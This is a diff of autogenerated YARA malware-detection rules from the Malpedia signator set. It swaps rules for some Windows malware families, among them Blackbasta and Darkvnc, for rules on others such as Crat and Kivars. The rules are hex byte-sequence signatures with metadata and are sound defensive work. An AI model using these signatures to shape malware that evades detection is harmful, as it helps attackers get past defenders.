$sequence_26 = { 8b06 85c0 75b7 8b7c241c 8b8780000000 } + $sequence_27 = { c744240840000000 891c24 89dd 8944240c 8b442418 89442404 e8???????? } + $sequence_28 = { 745c 01d8 890424 e8???????? 83ec04 89c6 } + $sequence_29 = { a1???????? 83c014 03c7 894df8 8945f4 7417 } + $sequence_30 = { 03c7 83f864 0f873f010000 8b45c0 8b7dbc } + $sequence_31 = { c744241000000000 c744240c50c30000 c744240850c30000 c744240400000000 e8???????? } condition: - 7 of them and filesize <1695744 + 7 of them and filesize <1196032 } -rule MALPEDIA_Win_Skyplex_Auto : FILE +rule MALPEDIA_Win_Greetingghoul_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3d9ea458-10c2-53d2-a125-12c3c77bb27b" + id = "b976275f-692f-5ebe-b54a-1ebae523b638" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skyplex_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.greetingghoul_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "d0704b78b2354a7199559252cd2d4f927c47dc758745bd631528996f74a24c6c" + logic_hash = "0a3e95007607705383664f43202a90a64da5b8da6ba3c7b7040fd8c369e8d944" score = 75 quality = 75 tags = "FILE" @@ -157447,32 +160187,32 @@ rule MALPEDIA_Win_Skyplex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 ff15???????? 898508fcffff ff15???????? } - $sequence_1 = { c3 8bff 56 57 33ff 8db704984100 ff36 } - $sequence_2 = { 59 e9???????? 8b36 8bce c1f905 8b0c8dc0af4100 } - $sequence_3 = { 8b7d08 8bc7 c1f805 8d3485c0af4100 8b06 } - $sequence_4 = { 50 e8???????? 50 8b4df8 8b11 8b45f8 50 } - $sequence_5 = { c785b8f6ffff684c4100 c785bcf6ffffb04c4100 ff15???????? 50 e8???????? 83c404 } - $sequence_6 = { 33d2 b9???????? 57 8bc2 c1f805 8b0485c0af4100 8bfa } - $sequence_7 = { 83bdf0feffff03 7327 8b85f0feffff 8b0c857c904100 51 } - $sequence_8 = { 66898c4558f7ffff 8d9558f7ffff 52 8d8540fbffff 50 } - $sequence_9 = { 6a01 ff15???????? c78544f6ffff01000000 eb0f 8b8d44f6ffff 83c101 898d44f6ffff } + $sequence_0 = { 56 57 8bf9 33f6 8a17 80fa20 } + $sequence_1 = { 750d 8a5702 83c702 bb10000000 } + $sequence_2 = { 03f1 eb03 83ceff 8a17 84d2 75a9 } + $sequence_3 = { 2bc8 7409 8b7df8 4e 43 } + $sequence_4 = { 751f 41 84c0 7405 83ea01 75eb 8b5dfc } + $sequence_5 = { 43 895dfc 47 eba7 5f 5e 83c8ff } + $sequence_6 = { 8a1a 8d5201 8a08 3acb 750c 40 84c9 } + $sequence_7 = { 33db 895dfc 8945f4 3806 740b } + $sequence_8 = { 83c404 891e 85db 746f 8b7508 0f57c0 57 } + $sequence_9 = { 7457 8d42d0 3c09 7708 } condition: - 7 of them and filesize <262144 + 7 of them and filesize <696320 } -rule MALPEDIA_Win_Blackbasta_Auto : FILE +rule MALPEDIA_Win_Crat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5c8e56ab-6cbd-5deb-8276-9c7c1c51570f" + id = "5ca84b15-9c50-5146-aeb0-8e43c37e0140" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackbasta_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crat_auto.yar#L1-L175" license_url = "N/A" - logic_hash = "7b0b80b4e818e69a7ef8a8ed63d1384307760adc672033eb9b7389cd6b55895b" + logic_hash = "a19b8917ee2e01478bdd8090b22583a65c2cc48e63af4151406da25e5b4c7a8a" score = 75 quality = 75 tags = "FILE" @@ -157486,32 +160226,39 @@ rule MALPEDIA_Win_Blackbasta_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff7590 8bcf e8???????? 84c0 751f 384704 7507 } - $sequence_1 = { 89b574ffffff 894588 89458c e8???????? 84c0 755d 384304 } - $sequence_2 = { 5b 8b4df4 64890d00000000 8d656c 5d c3 8d4d30 } - $sequence_3 = { e8???????? 83c404 85c0 0f849d010000 8d5823 83e3e0 8943fc } - $sequence_4 = { c745e000000000 c745e40f000000 c645d000 c745fc00000000 ff734c e8???????? 83c404 } - $sequence_5 = { b867666666 c645e800 f7ea c1fa05 8bc2 c1e81f 03c2 } - $sequence_6 = { 85f6 7462 8b7d28 3bf7 7416 0f1f440000 8bce } - $sequence_7 = { 56 e8???????? 83463008 83c410 0fb6c3 81c500020000 8b5c2474 } - $sequence_8 = { 8d4dc0 e8???????? 837e1401 741a 837dec01 740d 8d45d8 } - $sequence_9 = { 83c410 8bce 50 68???????? e8???????? 8bf0 c78574ffffff00000000 } + $sequence_0 = { e8???????? 488bd0 488d8d90010000 e8???????? 90 } + $sequence_1 = { e8???????? 488bd0 488d8d88000000 e8???????? 90 } + $sequence_2 = { 7406 e8???????? 90 488b542420 4883c2e8 } + $sequence_3 = { e8???????? 488bc8 4885c0 7433 } + $sequence_4 = { e8???????? 488bd0 488d8da8010000 e8???????? 90 } + $sequence_5 = { 48f7c20000ffff 7523 0fb7fa 8bcf e8???????? 4885c0 7427 } + $sequence_6 = { e8???????? 488bd0 488d4d58 e8???????? 90 } + $sequence_7 = { ebd0 498bc4 48833d????????10 480f4305???????? 482bc8 } + $sequence_8 = { 33d2 c1e902 f7f1 eb02 } + $sequence_9 = { ffd0 85c0 750f ff15???????? } + $sequence_10 = { 8bcb e8???????? 8b55d8 8b4b0c } + $sequence_11 = { 8bcb e8???????? 8b4b0c 8d4101 } + $sequence_12 = { 8b4004 8bca 3bc2 0f47c8 51 8b4d10 e8???????? } + $sequence_13 = { 8b4b0c 8d4101 89430c c60100 8b4dd4 41 } + $sequence_14 = { 8b4324 668948fe c740f800000000 c740f400000000 c740f000000000 5f 5e } + $sequence_15 = { 8b5508 0f57c0 56 8b750c b896000000 f30f7f01 } + $sequence_16 = { 8b4b0c 8d4101 89430c 8a45d3 8801 8b4dd4 41 } condition: - 7 of them and filesize <1758208 + 7 of them and filesize <4161536 } -rule MALPEDIA_Win_Darkvnc_Auto : FILE +rule MALPEDIA_Win_Kivars_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c383bb27-eefd-56e4-99f1-129a7cd0febf" + id = "81082c3d-5064-55a3-8cee-83fb88e85d6c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkvnc_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kivars_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "59a6ef1d2e391f7957c06b061626ceb22bd1c35faf4777593f7b9c101df055cb" + logic_hash = "57db268647853b0be399381edf4cd6dc1a86ac28f0c0a8c22aae4b45830a7fb0" score = 75 quality = 75 tags = "FILE" @@ -157525,32 +160272,38 @@ rule MALPEDIA_Win_Darkvnc_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1e904 4103ce 446bc11f 48634b28 418bd0 c1ea08 881401 } - $sequence_1 = { 488b4c2438 894148 c744244001000000 4c8b8c24a0000000 4c8b842498000000 8b942490000000 33c9 } - $sequence_2 = { 418bca d1e9 03c1 8a4d0c 99 41f7fa d3e0 } - $sequence_3 = { 41f7fb d2e0 41880432 49ffc2 4c3bd3 7ce5 488b5c2408 } - $sequence_4 = { 668944244c 488d4c2440 e8???????? 668944244e c744244400000000 eb0a 8b442444 } - $sequence_5 = { 418bc8 44888438d8000000 458d5801 44019fd8000100 418bc5 410fafc4 44899c24c0040000 } - $sequence_6 = { ff15???????? 33d2 b903000000 f7f1 89442428 c744242400000000 ba09000000 } - $sequence_7 = { eb0c 498b4770 4b8d0c76 4c8d2cc8 4d85ed 750a bb27030980 } - $sequence_8 = { 8d5808 e9???????? 488b4c2460 488d85b0000000 4533c0 4889442420 4d8bcf } - $sequence_9 = { 4d85e4 7416 498bcf e8???????? 0c80 488bcd 8ad0 } + $sequence_0 = { c705????????00000000 c644245423 c744245002000000 488d4c2450 e8???????? } + $sequence_1 = { 8d542440 8944244c 894c243c 6a14 } + $sequence_2 = { 8d8c247c010000 51 e8???????? 83c404 33c0 5f 5e } + $sequence_3 = { 44894c2420 4c89442418 89542410 48894c2408 4881eca8000000 488b05???????? } + $sequence_4 = { ff15???????? 8bc8 8d7308 83e908 8dbc2492000000 8bd1 } + $sequence_5 = { 4889842470020000 ff15???????? 89842430020000 c784242002000001000000 c784242c02000002000000 c64424707d } + $sequence_6 = { 755d 4c8b8424e0050000 488d942460020000 488d8c2450010000 e8???????? } + $sequence_7 = { 4883c005 4889442428 488b842470100000 4883c009 } + $sequence_8 = { 894c2430 89442444 894c2434 89442448 894c2438 8d542440 8944244c } + $sequence_9 = { 488d942440010000 488d4c2430 e8???????? 8b442434 83e001 85c0 } + $sequence_10 = { 50 8b4d18 51 8d5514 } + $sequence_11 = { 7476 eb09 80fb3d 0f8489000000 0fbe5c2412 c0e202 8a5c1c14 } + $sequence_12 = { 488bc8 ff15???????? 8b842460110000 ffc0 } + $sequence_13 = { 83fffe 741b 83ffff 0f858c000000 8d8c247c010000 } + $sequence_14 = { 8bf0 83c609 33ff 6a74 897c2414 e8???????? 83c404 } + $sequence_15 = { 48894c2408 4881ec68030000 48c7842448030000feffffff 488d8c2430010000 e8???????? } condition: - 7 of them and filesize <606208 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Ascentloader_Auto : FILE +rule MALPEDIA_Win_Invisimole_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a27ad34c-c5db-5069-a642-46b14138c3be" + id = "ca18c738-4139-5525-aa28-1ccc54f29c64" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ascentloader_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.invisimole_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "9df20341633fa22f46dd0bb0a3d7ffdb7631f541fddea2f57343c78db84232a1" + logic_hash = "c66d253d3c18c58309d81357b0c6a50ba445964c209a2fd7bab05aae7420f29c" score = 75 quality = 75 tags = "FILE" @@ -157564,32 +160317,32 @@ rule MALPEDIA_Win_Ascentloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 1bc0 f7d8 eb02 8bc3 85c0 } - $sequence_1 = { 741b 6a1a 2bf7 59 } - $sequence_2 = { 85c0 7414 8b0f e8???????? 8b4e48 e8???????? 33c0 } - $sequence_3 = { 40 001c5b 40 0023 } - $sequence_4 = { c78564ffffff76650d0a 66c78568ffffff0d0a c6856affffff00 f30f7f856cffffff 660f6f05???????? f30f7f857cffffff } - $sequence_5 = { 6a01 58 0f43f0 6a22 59 } - $sequence_6 = { 40 0038 aa 40 } - $sequence_7 = { 83f8ff 7518 ff15???????? 57 ff15???????? ff15???????? e9???????? } - $sequence_8 = { 85c0 7508 6a11 e8???????? 59 ff34f5c8484100 } - $sequence_9 = { 8d45e0 50 56 ff15???????? 8b5dec } + $sequence_0 = { 668945f0 8d863e020000 50 ffd7 33c9 668945f2 8d45f8 } + $sequence_1 = { 8d5590 52 50 e8???????? 83c40c 83f8ff 0f848df1ffff } + $sequence_2 = { 0fb65714 83c448 6a01 8d45ff 50 56 8855ff } + $sequence_3 = { 6a01 8d45ff 50 56 c645ff33 } + $sequence_4 = { 8bec 83ec4c 53 56 8bf0 57 8d45b4 } + $sequence_5 = { 47 83ff09 72d5 8b0d???????? 56 6a00 51 } + $sequence_6 = { 57 6860040000 33db 53 56 e8???????? a1???????? } + $sequence_7 = { 8b45fc 50 a1???????? 6a00 50 ffd7 8b4308 } + $sequence_8 = { 8b45f4 8a5dfb 50 ff15???????? 8ac3 5f } + $sequence_9 = { 53 e8???????? 8b75df 81fee6010000 0f8335050000 8a8746020000 0a4710 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_Sinowal_Auto : FILE +rule MALPEDIA_Win_Sysraw_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "31384acf-e07e-5abe-adce-b44a77e374ec" + id = "a9e810a6-264f-569e-b3d3-a9931864293b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sinowal_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sysraw_stealer_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "42d79ca235acd4d3a743286e206901b01ddea7a50a0ec3cebf0e0027f96ae13f" + logic_hash = "a25f6b3ba819f069101fb648f9516e51ed0f5298199445e1b66fa7cef9e138d8" score = 75 quality = 75 tags = "FILE" @@ -157603,32 +160356,32 @@ rule MALPEDIA_Win_Sinowal_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d95bcfdffff 52 e8???????? 83c40c c745f000000000 } - $sequence_1 = { 8b450c 8b4d08 8d5401ff 8955fc eb12 8b4508 83c001 } - $sequence_2 = { c745f400000000 c745f800000000 8b4510 8945fc 8b4510 33d2 b908000000 } - $sequence_3 = { 6a00 8b45f8 50 ff15???????? 8b45f4 } - $sequence_4 = { 8b0495d0669600 2500000080 8b4df8 8b148dd4669600 81e2ffffff7f 0bc2 } - $sequence_5 = { 8945d8 c745e400000000 c745fc00000000 68???????? } - $sequence_6 = { 837d0800 7406 837d0c00 7502 eb64 8b450c } - $sequence_7 = { 89048dd0669600 8b55fc 8b45fc 8b0c85d0669600 890c95d0669600 8b55fc } - $sequence_8 = { 890d???????? c705????????00000000 a1???????? 8b0c85d0669600 894dfc } - $sequence_9 = { c745f400000000 c745f800000000 c745fc00000000 837d0800 7416 837d0c00 7410 } + $sequence_0 = { 50 8d9504ffffff 51 8d8508ffffff 52 8d8d0cffffff } + $sequence_1 = { ffd6 a1???????? ba???????? 8b4814 c1e102 8bf9 8b480c } + $sequence_2 = { 51 89558c ffd7 8b558c f7d8 1bc0 f7d8 } + $sequence_3 = { 7507 c745ec01000000 8b4514 8b7de8 2bc7 6800000040 } + $sequence_4 = { ff15???????? 8b4dc0 894dd4 8d55c4 52 } + $sequence_5 = { c7400807000000 c7400c0f000000 c740101f000000 c740143f000000 c740187f000000 } + $sequence_6 = { 89bde0feffff ffd6 8b3d???????? 50 } + $sequence_7 = { c7420485ae67bb 8b4590 c7400872f36e3c 8b4d90 c7410c3af54fa5 } + $sequence_8 = { 53 56 57 8bd0 8bf1 8bf8 8bd9 } + $sequence_9 = { 8975c8 8975b8 8975a8 ff15???????? 8b45d0 8975cc 50 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <1540096 } -rule MALPEDIA_Win_Icefog_Auto : FILE +rule MALPEDIA_Win_Darkpink_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "048267f9-e0c5-52eb-96a2-fb16cbcf8de1" + id = "5843ba22-3e12-5b07-a302-af204fd4f478" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icefog_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkpink_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "1d4c21c23eefcc954f2b32ae717065ebcfe80845052716e0c9e4c85776b4e83c" + logic_hash = "f794d5918ecf33b4e0beff127be6289d027ab1ea81bf4922e3a718a3afdf8df9" score = 75 quality = 75 tags = "FILE" @@ -157642,34 +160395,34 @@ rule MALPEDIA_Win_Icefog_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 80e3fb 899588feffff 33d2 80c327 85ff 0f94c2 85d2 } - $sequence_1 = { c78530ffffff05000000 eb0f 83f803 750a c78530ffffff02000000 8b4604 50 } - $sequence_2 = { 751e 8b4d0c 8d450c 50 57 51 e8???????? } - $sequence_3 = { 8bec 53 56 33f6 39770c 7e24 33db } - $sequence_4 = { 8b5108 8b45f4 03d3 52 53 50 6a03 } - $sequence_5 = { 50 e8???????? 8b0e 8d55d4 68ffffff7f 52 894de8 } - $sequence_6 = { 8b5610 0bf8 8b4508 52 50 e8???????? 8b4e18 } - $sequence_7 = { 50 51 e8???????? 8bd8 83c408 85db 0f841b010000 } - $sequence_8 = { e8???????? 53 e8???????? 53 57 e8???????? 83c42c } - $sequence_9 = { dfe0 ddd9 f6c441 0f8572010000 dd05???????? d8d1 dfe0 } + $sequence_0 = { 8b048d442a4000 ffe0 f7c703000000 7413 } + $sequence_1 = { 57 50 683f000f00 6a00 68???????? 6801000080 } + $sequence_2 = { c3 c705????????08924100 b001 c3 68???????? e8???????? c70424???????? } + $sequence_3 = { 8d41fc 50 56 57 e8???????? 57 } + $sequence_4 = { 8b85b0f8ffff 0fb70485c43c4100 8d0485c0334100 50 8d8590faffff 03c7 50 } + $sequence_5 = { 33f6 8b86f09d4100 85c0 740e } + $sequence_6 = { 68???????? ff75f4 ffd6 85c0 0f85ca000000 50 8d45f8 } + $sequence_7 = { 8b0495f09d4100 f644082801 7421 57 } + $sequence_8 = { e8???????? 6a44 8d45ac 6a00 50 } + $sequence_9 = { 6a26 58 0fb60c85c63c4100 0fb63485c73c4100 8bf9 8985b0f8ffff c1e702 } condition: - 7 of them and filesize <1187840 + 7 of them and filesize <237568 } -rule MALPEDIA_Win_Prikormka_Auto : FILE +rule MALPEDIA_Win_Unidentified_100_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "942667ef-c0ed-5e6f-acdd-388f6c8d0b49" + id = "ef81c2e4-5fa3-571d-bebe-aeaf2bbd4859" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prikormka_auto.yar#L1-L426" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_100_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "7c65eb7008c5e728405addd601d63974803e3912597af2618d49b7f4b185b6c5" + logic_hash = "144a60b0164255f58e6624e761b77d4aa80b8a589ef3259bf29c12a9ff5a78b0" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -157681,69 +160434,32 @@ rule MALPEDIA_Win_Prikormka_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d0446 50 e8???????? 83c40c 6a00 56 } - $sequence_1 = { 8d1446 52 e8???????? 83c40c } - $sequence_2 = { ffd3 8b2d???????? 85c0 7405 } - $sequence_3 = { 51 e8???????? 83c40c 68???????? ffd7 } - $sequence_4 = { 85f6 7420 68???????? ffd7 } - $sequence_5 = { ff15???????? 68???????? ffd7 03c0 50 } - $sequence_6 = { 8b1d???????? 83c40c 6a00 56 ffd3 8b2d???????? } - $sequence_7 = { 56 ffd3 85c0 7405 6a02 56 } - $sequence_8 = { 740e 68???????? 50 ff15???????? ffd0 } - $sequence_9 = { 68???????? 6a00 6a00 ff15???????? 85c0 7502 59 } - $sequence_10 = { 83c40c 8d442404 50 ff15???????? 5e } - $sequence_11 = { 7408 41 42 3bce } - $sequence_12 = { 85c0 7502 59 c3 50 ff15???????? b801000000 } - $sequence_13 = { c3 57 6a00 6a00 6a00 6a02 } - $sequence_14 = { 68???????? ff15???????? 0fb7c0 6683f805 } - $sequence_15 = { ff15???????? ffd0 c705????????01000000 c705????????01000000 } - $sequence_16 = { 5e 85c0 7422 68???????? 50 } - $sequence_17 = { 0fb7c0 6683f805 7d09 b801000000 } - $sequence_18 = { 5e 85c0 7414 c705????????01000000 } - $sequence_19 = { 33f6 e8???????? e8???????? e8???????? e8???????? e8???????? e8???????? } - $sequence_20 = { 50 e8???????? 8b2d???????? 83c40c 6a00 } - $sequence_21 = { ff15???????? 8bf0 ff15???????? 3db7000000 751f 56 } - $sequence_22 = { 83c102 6685d2 75f5 2bce 8d1400 52 d1f9 } - $sequence_23 = { 75f5 8b0d???????? 2bc2 8b15???????? d1f8 } - $sequence_24 = { 751f 56 ff15???????? 33c0 } - $sequence_25 = { 6685c9 75f5 2bc6 8d0c12 } - $sequence_26 = { 2bc6 8d0c12 51 d1f8 } - $sequence_27 = { 8b35???????? 83c40c 68???????? ffd6 03c0 } - $sequence_28 = { 50 e8???????? b8???????? 83c40c 8d5002 } - $sequence_29 = { 75f5 8d0c12 2bc6 51 d1f8 8d544408 } - $sequence_30 = { d1f8 8d7102 8da42400000000 668b11 83c102 } - $sequence_31 = { 85c0 7409 6a02 68???????? } - $sequence_32 = { 50 ff15???????? 0fb74c2416 0fb7542414 } - $sequence_33 = { d1f8 8bd0 b8???????? 8d7002 8da42400000000 668b08 83c002 } - $sequence_34 = { 6685c9 75f5 2bc2 b9???????? d1f8 8d7102 668b11 } - $sequence_35 = { ffd6 50 68???????? 57 ffd6 03c7 50 } - $sequence_36 = { 56 57 68???????? 33ff 57 57 ff15???????? } - $sequence_37 = { e8???????? 83c40c eb0d 6a00 6800020000 } - $sequence_38 = { d1f8 8d7102 668b11 83c102 6685d2 75f5 8d1400 } - $sequence_39 = { 6685d2 75f5 8d1400 2bce 52 d1f9 } - $sequence_40 = { 6a00 6800020000 ff15???????? 68???????? } - $sequence_41 = { e8???????? 83c40c 6a00 68???????? ffd3 85c0 7409 } - $sequence_42 = { 6a5c 99 5f f7ff 83f801 } - $sequence_43 = { 0f87f5090000 ff248505eb0010 33c0 838df4fbffffff 8985a0fbffff } - $sequence_44 = { 48 48 8975f4 7479 83e848 745f } - $sequence_45 = { 56 8bc3 2bc1 6a5c 99 } - $sequence_46 = { 32a832d232e0 32e6 3209 3310 3329 333d???????? 335f33 } + $sequence_0 = { 488d9424f0030000 488b4c2448 e8???????? e9???????? 4c8d8c2490070000 4533c0 488d942470130000 } + $sequence_1 = { 4889442420 4c8d8c24e0020000 448b442458 8b54245c 8b4c2454 } + $sequence_2 = { 0f8dac000000 c644242000 eb0b 0fb6442420 fec0 88442420 0fb6442420 } + $sequence_3 = { 448bc3 488d1580860000 e8???????? 85c0 7429 } + $sequence_4 = { 488bf8 33c0 b9fe010000 f3aa 4c8b8c24b8060000 4c8b8424b0060000 488d156dfd0100 } + $sequence_5 = { eb1d 488d05a7690100 ffcb 488d0c9b 488d0cc8 ff15???????? ff0d???????? } + $sequence_6 = { 488d05a7690100 ffcb 488d0c9b 488d0cc8 ff15???????? } + $sequence_7 = { ffc0 8944243c 486344243c 483b442458 7320 486344243c } + $sequence_8 = { 33c0 b97a010000 f3aa 488d8424b0190000 488d0deee80100 } + $sequence_9 = { 488b842490030000 4889842490000000 48c7442458ffffffff 48ff442458 488b842490000000 488b4c2458 66833c4800 } condition: - 7 of them and filesize <401408 + 7 of them and filesize <372736 } -rule MALPEDIA_Win_Sodamaster_Auto : FILE +rule MALPEDIA_Win_Xfscashncr_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5c8830e9-776d-5d52-b260-bf93f938f131" + id = "6ee5ebd5-3415-5529-b820-2ef4f50b7f37" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sodamaster_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xfscashncr_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "a33360882a3ef608d87207bac124912433c6a8960ab3afceadfd4533af00bd98" + logic_hash = "9081cad85dadcbc9b76a9d19d302868541784728cc3671f5b0e80a45a72963e6" score = 75 quality = 75 tags = "FILE" @@ -157757,32 +160473,32 @@ rule MALPEDIA_Win_Sodamaster_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? c70009000000 e8???????? ebd2 8bc3 c1f805 8d3c85a0330110 } - $sequence_1 = { 8908 894804 8bf0 eb02 33f6 6a40 6800100000 } - $sequence_2 = { 8d4900 8d97feefff7f 85d2 7419 8a140e 84d2 7412 } - $sequence_3 = { 8945e4 3d01010000 7d0d 8a4c181c 888810080110 40 } - $sequence_4 = { 33f6 6a40 6800100000 8d4301 50 6a00 ff15???????? } - $sequence_5 = { 83c424 83ffff 5f 5e 5b } - $sequence_6 = { 83c8ff e9???????? 8bc6 c1f805 8bfe 53 8d1c85a0330110 } - $sequence_7 = { 33f6 8d45f8 50 8b4508 c745e8636d643d c645ec00 } - $sequence_8 = { e8???????? 56 e8???????? 83c418 ff15???????? } - $sequence_9 = { 6a02 53 68ff010f00 52 } + $sequence_0 = { 0fb6c8 85c9 744e 8b4d10 e8???????? 0fb730 8b8d54ffffff } + $sequence_1 = { 50 8b4de8 8b5110 52 6a00 682d010000 8b45e8 } + $sequence_2 = { 898518feffff 8b8d18feffff 898d14feffff c745fc00000000 8b9514feffff 52 e8???????? } + $sequence_3 = { 686b070000 68???????? 8b4508 50 e8???????? 83c40c 8b4508 } + $sequence_4 = { 8b4de4 66891401 0fb755f4 81fa00800000 7f27 0fb745f4 3d00800000 } + $sequence_5 = { 83c418 8b08 8b5004 894d10 895514 c78564ffffff00000000 eb35 } + $sequence_6 = { e8???????? 0fb6d0 85d2 7557 837de802 750f 8b4520 } + $sequence_7 = { 837d0800 744a b801000000 85c0 7441 8b4508 83c008 } + $sequence_8 = { 8b4d08 d9ee d95c81fc 8b55f0 8b4508 d90490 d9ee } + $sequence_9 = { 8b5508 83e21f c1e206 8b048dc0195700 0fbe4c1004 81e17fffffff 8b5508 } condition: - 7 of them and filesize <134144 + 7 of them and filesize <3126272 } -rule MALPEDIA_Win_Kutaki_Auto : FILE +rule MALPEDIA_Win_Gazer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "09920faf-098e-5e77-9216-3a3bfa3a1490" + id = "4f697767-8c05-5c0d-bde5-d6a7fdfb5341" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kutaki_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gazer_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "cdd66e692bdc9daff0e282b4897c4e9339c8de45be71e54a60a94829ea33b905" + logic_hash = "9d7c4a164f0a9c13470f23ca334f1d2575ebac4454f4b53ffe47ee33d23ce84e" score = 75 quality = 75 tags = "FILE" @@ -157796,32 +160512,32 @@ rule MALPEDIA_Win_Kutaki_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 52 6a01 6880000000 ff15???????? 83c41c c745fc0c000000 } - $sequence_1 = { 0f803a020000 8b450c 8910 e9???????? } - $sequence_2 = { ff15???????? 898528ffffff eb0a c78528ffffff00000000 8d4dc8 ff15???????? } - $sequence_3 = { ff15???????? 898568feffff eb0a c78568feffff00000000 8b459c 50 ff15???????? } - $sequence_4 = { c745fc3c000000 660fb64dd8 6683e10f 666bc910 0f80c9020000 660fb645c8 6699 } - $sequence_5 = { 8d4580 50 ff15???????? 